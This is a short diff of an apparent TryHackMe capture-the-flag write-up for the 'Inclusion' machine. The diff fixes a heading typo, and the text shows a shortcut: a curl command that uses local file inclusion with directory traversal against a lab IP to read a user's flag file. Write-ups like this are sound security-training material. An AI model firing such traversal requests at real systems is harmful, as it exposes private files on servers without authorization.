Prim1Tive/CTFwriteups/TryHackMe/Inclusion.md

-# SOLVE THIS MACHIN IN 2 MINUTES!
+# SOLVE THIS MACHINE IN 2 MINUTES!
 if we just wanted to get the flags and not dealing with all this nonsense we could have just do LFI at firefox...
 ``` html
 curl http://10.10.120.193/article?name=/../../../../../../../../../../home/falconfeast/user.txt